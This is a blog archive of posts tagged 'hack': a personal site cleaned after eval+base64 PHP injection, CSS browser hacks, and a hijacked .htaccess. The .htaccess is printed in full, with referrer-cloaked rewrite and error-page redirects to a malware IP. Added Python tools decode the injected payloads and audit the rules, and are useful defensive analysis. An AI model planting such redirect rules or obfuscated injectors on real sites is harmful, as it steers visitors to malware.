Pixelastic

You can cut our wings but we will always remember what it was like to fly.

Posts tagged with "hack"

This blog got hacked

Today, at about 9pm (GMT+12), I found my own blog hacked. When I wanted to access it, I was redirected to a malware site.

Half an hour later, it is back online again, and here is what I did.

First, I downloaded the webpage to my computer using curl http://www.pixelastic.com/ to analyse it in search of a clue about the attack vector.

Unfortunately, I couldn't easily find the culprit. No img tag loading a php file, no XSS injection that I could find. My guess is that the attacker tampered with the js files loaded to add their own custom evil script. But as my js files are concatenated and compressed into a file with an md5 name, it wasn't obvious that they had been compromised.

After that, I sshed to the server and tried to find which files were modified since my last commit. As I'm using Mercurial for that, this was a simple matter of hg status.

And I got a shitload of results. Actually, all my php files had been modified (and as I'm using cakePHP, that means a lot of files). Running hg diff, I found out that all the php code of each file had been replaced with evil code (enclosed in several layers of eval+base64).

I updated my working directory to the latest commit with hg update --clean to get all those files back as they were before the attack. Running hg status once more still showed a bunch of new php files added. Running hg purge finally got rid of them.

I finally deleted all the compressed css and js files, to force them to be created again, and that's it, the website is online again.
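As an added example (this is not the post's own code): hg diff shows that every file was replaced by code wrapped in several layers of eval+base64, but it does not tell you what the innermost payload does. The script below scans a tree of files for the eval(base64_decode("...")) wrapper and peels the layers one by one, stopping at the first layer that is not valid base64 or at a depth limit so a malformed file cannot make it loop. The sample files, the cakePHP-style paths and the malware.example host are constructed placeholders, not anything recovered from the real attack.

```python
import base64
import re

# One obfuscation layer of the kind the post describes: eval(base64_decode("...")).
# The base64 alphabet is A-Z a-z 0-9 + / =; whitespace inside the literal is tolerated.
LAYER_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)',
    re.IGNORECASE,
)


def peel_eval_base64(code, max_layers=32):
    """Strip nested eval(base64_decode(...)) wrappers.

    Returns (innermost_code, layers_peeled). Decoding stops at the first layer
    that is not valid base64, or after max_layers, so a malformed or
    adversarial input cannot loop forever.
    """
    layers = 0
    while layers < max_layers:
        match = LAYER_RE.search(code)
        if not match:
            break
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            code = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers += 1
    return code, layers


def scan_files(files):
    """files: {path: contents}. Returns [(path, layers, payload)] for every file
    that carries at least one eval+base64 layer; clean files are omitted."""
    findings = []
    for path, contents in sorted(files.items()):
        payload, layers = peel_eval_base64(contents)
        if layers:
            findings.append((path, layers, payload))
    return findings


def wrap_eval_base64(payload, layers):
    """Build a test fixture the way an injector would: the payload, then
    `layers` nested eval(base64_decode(...)) wrappers, PHP tags on the outside only."""
    code = payload
    for _ in range(layers):
        blob = base64.b64encode(code.encode()).decode()
        code = 'eval(base64_decode("%s"));' % blob
    return "<?php " + code + " ?>"


# Constructed sample tree (placeholder paths and host): a cakePHP-style
# controller replaced by a 3-layer wrapper around a redirect, beside a clean view.
PAYLOAD = 'header("Location: http://malware.example/"); exit;'
SAMPLE_FILES = {
    "app/controllers/posts_controller.php": wrap_eval_base64(PAYLOAD, 3),
    "app/views/posts/index.ctp": "<h1><?php echo $title; ?></h1>",
}

if __name__ == "__main__":
    for path, layers, payload in scan_files(SAMPLE_FILES):
        print("%s: %d layer(s) -> %s" % (path, layers, payload))
```

Run it over a real tree by replacing SAMPLE_FILES with the output of hg status (or a walk of the web root). Real droppers often add gzinflate or str_rot13 around the base64; those need an extra decoding step per layer, which is a small extension of the loop above.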

I still don't have a clue how this happened. How did someone access my files? Is that an XSS attack? Was my password cracked? Is there another security weakness I'm not aware of?

 

EDIT: Got hacked again. Seeing that the cakePHP Cache files were deleted, I guess it is a known attack on a cake vulnerability. Got the website up again, but will fix it as soon as my holidays allow.

Some CSS hacks to target IE6 and IE7

After stopping using ugly IE hacks and moving to conditional comments to load a special IE stylesheet, I now use conditional comments to mark my body element with classes reflecting the current IE version.

<!--[if IE 6]><body class="ie ie6 ie-lt8 ie-lt9"><![endif]-->
<!--[if IE 7]><body class="ie ie7 ie-lt8 ie-lt9"><![endif]-->
<!--[if IE 8]><body class="ie ie8 ie-lt9"><![endif]-->
<!--[if IE 9]><body class="ie ie9"><![endif]-->
<!--[if !IE]><!--><body class="nie"><!--<![endif]-->

This saves me a lot of trouble: fewer files to manage and easier fixes to write. I'm quite happy with this solution and have tested it across several projects for the past 3 months. It works really well.

I had to work on a legacy project last week, where this technique wasn't implemented but all the css code was still compressed using CSSTidy. And I ran into a couple of issues.

CSSTidy messes the star and underscore hacks

Using the brilliant _property and *property hacks to target IE6 and IE7 does not work in conjunction with CSSTidy.

For the _property hack, the property is kept as-is, with the underscore, but as CSSTidy sorts properties alphabetically, _background gets placed before background. The later declaration wins, rendering the hack absolutely useless.

On the other hand, for the *property hack, the * gets removed and the value is merged with the original value of the correct property. Useless too.

Other solutions that worked

To avoid digging into CSSTidy one more time, I tried to find other ways to achieve the same effect.

To target IE6 I used the !ie6 hack by writing .mySelector { property:value !ie6; }. IE6 is dumb enough to understand any !blahblah as !important.

I could have also used the fact that IE6 understands .class1.class2 as .class2, and could have written .ie6.mySelector { property:value; } (of course, you have absolutely no class="ie6" in your code)

To target IE7 I made a custom selector that its parsing engine is the only one to understand : *:first-child + html .mySelector { property:value; }

 

CSS rule to target only Firefox

I just found (via enure.net) a CSS rule using a proprietary Mozilla filter that allows one to specifically target Mozilla.

I'm not a huge fan of CSS hacks like that; I usually restrict them to the bare minimum of IE conditional comments. But in some edge cases it is useful, if you really don't have other options.

I'd like to find the equivalent rules (using proprietary rules, not parser bugs) for Safari, Chrome and Opera.

@-moz-document url-prefix() {
    p { color: red; }
}

.htaccess hacked

Today a client called me telling me that their website was unavailable, or more exactly that the full content of the FTP was displayed instead of their homepage.

After a little investigation, it appeared that the .htaccess file had been modified; here is the content I found:

RewriteEngine On
ErrorDocument 400 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 401 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 403 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 404 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 500 http://217.23.5.232/hitin.php?land=20&affid=20116
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://217.23.5.232/hitin.php?land=20&affid=20116 [R=301,L]

A little search online told me that this IP refers to a malware website launching a fake antivirus software installation.

I have no idea how the .htaccess got modified, but I changed the FTP password.
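The rule set above is a referrer-cloaking redirect: the RewriteConds only fire when the Referer header looks like it came from a search engine, so someone typing the URL directly never sees the redirect, while the ErrorDocument lines turn every error page into a bounce to the same host. As an added example (not the post's own code), the script below parses that .htaccess, flags ErrorDocument directives pointing off-site, and simulates which Referer values trigger the RewriteRule, applying mod_rewrite's [OR]/AND chaining of conditions. It assumes the site legitimately lives on www.example.com (a placeholder) and only models the HTTP_REFERER variable; any other test string is treated as not matching.

```python
import re
from urllib.parse import urlparse

# The .htaccess from the post, embedded verbatim so the audit runs offline.
HTACCESS = """RewriteEngine On
ErrorDocument 400 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 401 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 403 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 404 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 500 http://217.23.5.232/hitin.php?land=20&affid=20116
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://217.23.5.232/hitin.php?land=20&affid=20116 [R=301,L]
"""

# Assumed: the hostnames the site legitimately answers on (placeholder).
OWN_HOSTS = {"www.example.com"}


def parse_htaccess(text):
    """Return [(directive, args, flags)]; flags is the trailing [..] of a
    RewriteCond/RewriteRule as a set of upper-case names, e.g. {"OR"} or {"R", "L"}."""
    parsed = []
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        flags = set()
        if len(parts) > 2 and parts[-1][0] == "[" and parts[-1][-1] == "]":
            flags = {f.split("=")[0].upper() for f in parts.pop()[1:-1].split(",")}
        parsed.append((parts[0].lower(), parts[1:], flags))
    return parsed


def offsite_host(url):
    """Hostname of url if it is absolute and not one of ours, else None."""
    host = urlparse(url).hostname
    return host if host and host not in OWN_HOSTS else None


def external_error_documents(parsed):
    """An absolute URL in ErrorDocument makes Apache answer with a redirect
    instead of an error page; list the ones that send visitors off-site."""
    return [(int(a[0]), a[1]) for name, a, _ in parsed
            if name == "errordocument" and len(a) >= 2 and offsite_host(a[1])]


def cond_matches(args, flags, env):
    """Evaluate one RewriteCond against env (server variables). Only %{VAR}
    names present in env are modelled; any other test string fails closed."""
    var, pattern = args[0], args[1]
    negate = pattern.startswith("!")
    if negate:
        pattern = pattern[1:]
    if not (var.startswith("%{") and var.endswith("}")) or var[2:-1] not in env:
        return False
    hit = re.search(pattern, env[var[2:-1]], re.IGNORECASE if "NC" in flags else 0)
    return (hit is None) if negate else (hit is not None)


def simulate(parsed, path, referer):
    """Walk the rule set as mod_rewrite does: the RewriteConds before a
    RewriteRule guard it, [OR] joins a condition to the next one, otherwise
    they are ANDed. Returns the off-site URL the request is sent to, or None."""
    env = {"HTTP_REFERER": referer}
    conds = []
    for name, args, flags in parsed:
        if name == "rewritecond" and len(args) >= 2:
            conds.append((args, flags))
        elif name == "rewriterule" and len(args) >= 2:
            ok, i = True, 0
            while i < len(conds):
                group = [conds[i]]
                while "OR" in conds[i][1] and i + 1 < len(conds):
                    i += 1
                    group.append(conds[i])
                ok = ok and any(cond_matches(a, f, env) for a, f in group)
                i += 1
            conds = []
            if ok and re.search(args[0], path) and offsite_host(args[1]):
                return args[1]
    return None
```

Two things the simulation makes visible. First, because the RewriteCond patterns are unanchored substrings, a referer such as http://www.example.com/basket triggers the .*ask.* condition, so the redirect is not even limited to search-engine traffic. Second, the same check can be done live with curl by sending a forged Referer (curl -I -e http://www.google.com/ http://your-site/) and comparing it with a request that has no Referer at all; a 301 on the first and a 200 on the second is the signature of this kind of cloaking.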